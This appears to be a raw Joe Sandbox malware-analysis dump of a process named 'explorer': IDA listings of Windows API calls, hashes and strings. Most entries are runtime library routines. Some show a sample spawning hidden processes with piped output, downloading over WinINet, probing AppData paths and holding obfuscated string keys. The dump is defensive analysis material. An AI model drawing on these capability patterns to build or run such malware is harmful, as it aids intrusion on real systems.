                                                  • Instruction ID: 64c22640292da3bc94ca2a7dfbeb8dbf142865b608d6bde23bbfcc7cda47e6de
                                                  • Opcode Fuzzy Hash: ae41b9410bf412790e2c7b4608d6f20600b185a4399bbd743c5455751ec880d8
                                                  • Instruction Fuzzy Hash: DA41C2B9C14219AFDF20DF79DD88AAABBB9AF46200F1442DDE44DD7210DA349E858F50
                                                  APIs
                                                    • Part of subcall function 03236DD0: GetLastError.KERNEL32(00000000,00000000,?,03237BB7,?,00000000,00000000,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010), ref: 03236DD5
                                                    • Part of subcall function 03236DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010,03231112,00000000,00000000,00000000), ref: 03236E73
                                                    • Part of subcall function 03236DD0: _free.LIBCMT ref: 03236E32
                                                    • Part of subcall function 03236DD0: _free.LIBCMT ref: 03236E68
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 032427E0
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free$InfoLocale
                                                  • String ID:
                                                  • API String ID: 2003897158-0
                                                  • Opcode ID: 815eac5cf8d01f2a869ca76f75ef86b870bfae071775d19ee0e07de905a54173
                                                  • Instruction ID: c1432f1febf08a6defe61a919bab10986c49616aa80d0a6ecfa3185d31864f24
                                                  • Opcode Fuzzy Hash: 815eac5cf8d01f2a869ca76f75ef86b870bfae071775d19ee0e07de905a54173
                                                  • Instruction Fuzzy Hash: 4B218672520316EBDB2CDE16ED81E7E77ACEF45710F14447AF901DA140EBB4D980CA60
                                                  APIs
                                                    • Part of subcall function 03236DD0: GetLastError.KERNEL32(00000000,00000000,?,03237BB7,?,00000000,00000000,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010), ref: 03236DD5
                                                    • Part of subcall function 03236DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010,03231112,00000000,00000000,00000000), ref: 03236E73
                                                  • EnumSystemLocalesW.KERNEL32(03242539,00000001,00000000,?,-00000050,?,03242B67,00000000,?,?,?,00000055,?), ref: 03242485
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: a87df1f101b382613047679929c93179232a34889875092a4ef29498292a376f
                                                  • Instruction ID: 6c5f15cf7e423df92e6b4276513da697b076266455273a4eed3335086028cc74
                                                  • Opcode Fuzzy Hash: a87df1f101b382613047679929c93179232a34889875092a4ef29498292a376f
                                                  • Instruction Fuzzy Hash: 39110C3B210705DFDB1CEF7AE8A167AB795FF80758B18882DE94687A40D371B582CB40
                                                  APIs
                                                    • Part of subcall function 03236DD0: GetLastError.KERNEL32(00000000,00000000,?,03237BB7,?,00000000,00000000,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010), ref: 03236DD5
                                                    • Part of subcall function 03236DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010,03231112,00000000,00000000,00000000), ref: 03236E73
                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,03242755,00000000,00000000,?), ref: 032429E4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale
                                                  • String ID:
                                                  • API String ID: 3736152602-0
                                                  • Opcode ID: 26f07af0dabc7f1b4b0e74d5353b064c2f0b4f9fff5eabbfee8672b16bd36ea2
                                                  • Instruction ID: fb1dc31dda6910bfc1732a11ecc70fd506d06a4a77448da379715105bc49f01d
                                                  • Opcode Fuzzy Hash: 26f07af0dabc7f1b4b0e74d5353b064c2f0b4f9fff5eabbfee8672b16bd36ea2
                                                  • Instruction Fuzzy Hash: 6FF08636520326EBDB2DDA268845BBA7758DB40654F194C65EC06A7280EA74FA81C6E0
                                                  APIs
                                                    • Part of subcall function 03236DD0: GetLastError.KERNEL32(00000000,00000000,?,03237BB7,?,00000000,00000000,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010), ref: 03236DD5
                                                    • Part of subcall function 03236DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010,03231112,00000000,00000000,00000000), ref: 03236E73
                                                    • Part of subcall function 03236DD0: _free.LIBCMT ref: 03236E32
                                                    • Part of subcall function 03236DD0: _free.LIBCMT ref: 03236E68
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 03242375
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free$InfoLocale
                                                  • String ID: utf8
                                                  • API String ID: 2003897158-905460609
                                                  • Opcode ID: 1a50219c45e0f86195c73e8324d3b86a91f41b297ed48a34680e68a7d2f69772
                                                  • Instruction ID: 1a792d372c46a47a1345883546235cae7b4e07f5cf5c93ffdd669779188ffe48
                                                  • Opcode Fuzzy Hash: 1a50219c45e0f86195c73e8324d3b86a91f41b297ed48a34680e68a7d2f69772
                                                  • Instruction Fuzzy Hash: B1F0A936620315A7C718FF25EC45EBE77ECDF45710F0540B9A502DB240EAB4AD458750
                                                  APIs
                                                    • Part of subcall function 03236DD0: GetLastError.KERNEL32(00000000,00000000,?,03237BB7,?,00000000,00000000,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010), ref: 03236DD5
                                                    • Part of subcall function 03236DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010,03231112,00000000,00000000,00000000), ref: 03236E73
                                                  • EnumSystemLocalesW.KERNEL32(0324278C,00000001,FFFFFFFF,?,-00000050,?,03242B2B,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 032424F8
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: 40d4383fa741deeaab6a01f01166a2f2c9db120c130a6d65ababe22d6a5f9a62
                                                  • Instruction ID: 9f986493c96a2504ed5dc5dabf540b65b2c435ab0a501f47b767829dee62812a
                                                  • Opcode Fuzzy Hash: 40d4383fa741deeaab6a01f01166a2f2c9db120c130a6d65ababe22d6a5f9a62
                                                  • Instruction Fuzzy Hash: 5AF0FC363103059FDB1C9F3A9C85B7A7B95EF81768F09886DF9058B540C6B19981CB50
                                                  APIs
                                                    • Part of subcall function 032326F0: EnterCriticalSection.KERNEL32(-000486C1,?,032339D5,00000000,03263F78,0000000C,0323399C,?,?,0323A7C3,?,?,03236F72,00000001,00000364,00000006), ref: 032326FF
                                                  • EnumSystemLocalesW.KERNEL32(032384AF,00000001,03264198,0000000C,032388DA,00000000), ref: 032384F4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  • Opcode ID: 5ce8623959c4318732d5f07fc446e1751f04b42b7088777a76d72a303d10c316
                                                  • Instruction ID: 9e612e2d60be293dc54c5b3779401f8e23e0988d80e474ec89b18d2ff483e147
                                                  • Opcode Fuzzy Hash: 5ce8623959c4318732d5f07fc446e1751f04b42b7088777a76d72a303d10c316
                                                  • Instruction Fuzzy Hash: AEF0497AA60300EFDB04EF98E845B9D7BF0EF09B20F10805AE8109B291CBB599808F45
                                                  APIs
                                                    • Part of subcall function 03236DD0: GetLastError.KERNEL32(00000000,00000000,?,03237BB7,?,00000000,00000000,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010), ref: 03236DD5
                                                    • Part of subcall function 03236DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010,03231112,00000000,00000000,00000000), ref: 03236E73
                                                  • EnumSystemLocalesW.KERNEL32(03242321,00000001,FFFFFFFF,?,?,03242B89,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 032423FF
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: 3f8d002ae3a61e943820675aa568f98ec293ef3c92ebd9cff39c50b6a4e1e694
                                                  • Instruction ID: 171964581089636dfe45ac941cc1d714da111830d80d4a4e1fcb81f3c8677fde
                                                  • Opcode Fuzzy Hash: 3f8d002ae3a61e943820675aa568f98ec293ef3c92ebd9cff39c50b6a4e1e694
                                                  • Instruction Fuzzy Hash: 90F0EC3931030597CB08EF76E84576A7F54EFC2710F0A8499FE058B541D6B199C2C790
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,03235D32,?,20001004,00000000,00000002,?,?,0323533F), ref: 03238A12
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  • Opcode ID: 17b755f098150e7da1aaeb93f7d3f2372f091ab0840c9ccf00ada5a9d59768c7
                                                  • Instruction ID: b99c411c8849bdf6fe444d8215cc4457af1a93119f6144be08a3974c8bba13c5
                                                  • Opcode Fuzzy Hash: 17b755f098150e7da1aaeb93f7d3f2372f091ab0840c9ccf00ada5a9d59768c7
                                                  • Instruction Fuzzy Hash: CCE04FB5550318BBCF12AF61EC08EAE7F26EF45761F058011FD056A224CBB29A619AD4
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0002A614,0322A128), ref: 0322A60D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  Similarity
                                                  • API ID: HeapProcess
                                                  • String ID:
                                                  • API String ID: 54951025-0
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  Similarity
                                                  • API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                  • String ID:
                                                  • API String ID: 4283097504-0
                                                  APIs
                                                  • GetTempPathA.KERNEL32(00000080,?), ref: 0320832D
                                                  • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000), ref: 03208403
                                                  • SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 03208415
                                                  • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 03208459
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000044,?), ref: 03208481
                                                  • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 0320848F
                                                  • WaitForSingleObject.KERNEL32(?,00000064), ref: 032084B8
                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 032084DA
                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 032084FE
                                                  • ReadFile.KERNEL32(00000000,?,0000007F,00000000,00000000), ref: 03208525
                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0320856A
                                                  • CloseHandle.KERNEL32(?), ref: 03208581
                                                  • CloseHandle.KERNEL32(?), ref: 03208589
                                                  • CloseHandle.KERNEL32(00000000), ref: 03208591
                                                  • CloseHandle.KERNEL32(00000000), ref: 03208599
                                                  • GetLastError.KERNEL32 ref: 032085A3
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  Similarity
                                                  • API ID: Handle$ClosePipeWow64$NamedPeek$CreateRedirection$DisableErrorFileInformationLastObjectPathProcessReadRevertSingleTempWait
                                                  • String ID: D
                                                  • API String ID: 3215130363-2746444292
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  Similarity
                                                  • API ID: _free$___from_strstr_to_strchr
                                                  • String ID:
                                                  • API String ID: 3409252457-0
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  Similarity
                                                  • API ID: _free$Info
                                                  • String ID:
                                                  • API String ID: 2509303402-0
                                                  APIs
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(03268FA8,00000FA0,?,?,032299D8), ref: 03229A06
                                                  • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,032299D8), ref: 03229A11
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,032299D8), ref: 03229A22
                                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 03229A34
                                                  • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 03229A42
                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,032299D8), ref: 03229A65
                                                  • DeleteCriticalSection.KERNEL32(03268FA8,00000007,?,?,032299D8), ref: 03229A81
                                                  • CloseHandle.KERNEL32(00000000,?,?,032299D8), ref: 03229A91
                                                  Strings
                                                  • SleepConditionVariableCS, xrefs: 03229A2E
                                                  • WakeAllConditionVariable, xrefs: 03229A3A
                                                  • kernel32.dll, xrefs: 03229A1D
                                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 03229A0C
                                                   Memory Dump Source
                                                   • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                  • API String ID: 2565136772-3242537097
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 03241751
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240A24
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240A36
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240A48
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240A5A
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240A6C
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240A7E
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240A90
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240AA2
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240AB4
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240AC6
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240AD8
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240AEA
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240AFC
                                                  • _free.LIBCMT ref: 03241746
                                                    • Part of subcall function 032381B6: HeapFree.KERNEL32(00000000,00000000,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?), ref: 032381CC
                                                    • Part of subcall function 032381B6: GetLastError.KERNEL32(?,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?,?), ref: 032381DE
                                                  • _free.LIBCMT ref: 03241768
                                                  • _free.LIBCMT ref: 0324177D
                                                  • _free.LIBCMT ref: 03241788
                                                  • _free.LIBCMT ref: 032417AA
                                                  • _free.LIBCMT ref: 032417BD
                                                  • _free.LIBCMT ref: 032417CB
                                                  • _free.LIBCMT ref: 032417D6
                                                  • _free.LIBCMT ref: 0324180E
                                                  • _free.LIBCMT ref: 03241815
                                                  • _free.LIBCMT ref: 03241832
                                                  • _free.LIBCMT ref: 0324184A
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3907804496
                                                  APIs
                                                    • Part of subcall function 03243758: CreateFileW.KERNEL32(00000000,00000000,?,03243B48,?,?,00000000,?,03243B48,00000000,0000000C), ref: 03243775
                                                  • GetLastError.KERNEL32 ref: 03243BB3
                                                  • __dosmaperr.LIBCMT ref: 03243BBA
                                                  • GetFileType.KERNEL32(00000000), ref: 03243BC6
                                                  • GetLastError.KERNEL32 ref: 03243BD0
                                                  • __dosmaperr.LIBCMT ref: 03243BD9
                                                  • CloseHandle.KERNEL32(00000000), ref: 03243BF9
                                                  • CloseHandle.KERNEL32(032373F1), ref: 03243D46
                                                  • GetLastError.KERNEL32 ref: 03243D78
                                                  • __dosmaperr.LIBCMT ref: 03243D7F
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                  • String ID: H
                                                  • API String ID: 4237864984-2852464175
                                                  APIs
                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 0322CE1F
                                                  • type_info::operator==.LIBVCRUNTIME ref: 0322CE41
                                                  • ___TypeMatch.LIBVCRUNTIME ref: 0322CF50
                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 0322D022
                                                  • _UnwindNestedFrames.LIBCMT ref: 0322D0A6
                                                  • CallUnexpected.LIBVCRUNTIME ref: 0322D0C1
                                                  Similarity
                                                  • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 2123188842-393685449
                                                  APIs
                                                  • _free.LIBCMT ref: 03236CCE
                                                    • Part of subcall function 032381B6: HeapFree.KERNEL32(00000000,00000000,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?), ref: 032381CC
                                                    • Part of subcall function 032381B6: GetLastError.KERNEL32(?,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?,?), ref: 032381DE
                                                  • _free.LIBCMT ref: 03236CDA
                                                  • _free.LIBCMT ref: 03236CE5
                                                  • _free.LIBCMT ref: 03236CF0
                                                  • _free.LIBCMT ref: 03236CFB
                                                  • _free.LIBCMT ref: 03236D06
                                                  • _free.LIBCMT ref: 03236D11
                                                  • _free.LIBCMT ref: 03236D1C
                                                  • _free.LIBCMT ref: 03236D27
                                                  • _free.LIBCMT ref: 03236D35
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  APIs
                                                  • InternetOpenA.WININET(0325CE7B,00000000,00000000,00000000,00000000), ref: 0321CAAF
                                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0321CACC
                                                  • InternetReadFile.WININET(00000000,?,03E80000,03E80000), ref: 0321CAE0
                                                  • InternetCloseHandle.WININET(00000000), ref: 0321CAEB
                                                  • InternetCloseHandle.WININET(?), ref: 0321CAF0
                                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 0321CB49
                                                  Similarity
                                                  • API ID: Internet$CloseHandleOpen$FileReadSleep
                                                  • String ID: 246122658369$ZJF=
                                                  • API String ID: 2890883735-1835274619
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 246122658369$ZtF=$axS5 ykoPx==
                                                  • API String ID: 0-949366062
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  Similarity
                                                  • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                                                  • String ID:
                                                  • API String ID: 3943753294-0
                                                  Similarity
                                                  • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$Cnd_broadcast
                                                  • String ID:
                                                  • API String ID: 3990724213-0
APIs
  • Part of subcall function 0320A470: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,74D40A26,00000000,?), ref: 0320A4BA
• GetFileAttributesA.KERNEL32(?,?,00000000,00000000,03267494,0000000E,74D40A26,00000000,00000000), ref: 0321AE2D
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
Similarity
• API ID: AttributesFileFolderPath
• String ID: .$246122658369$Xq==$ZJF=$ZNiq
• API String ID: 1512852658-2334461054
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
• Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
• Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
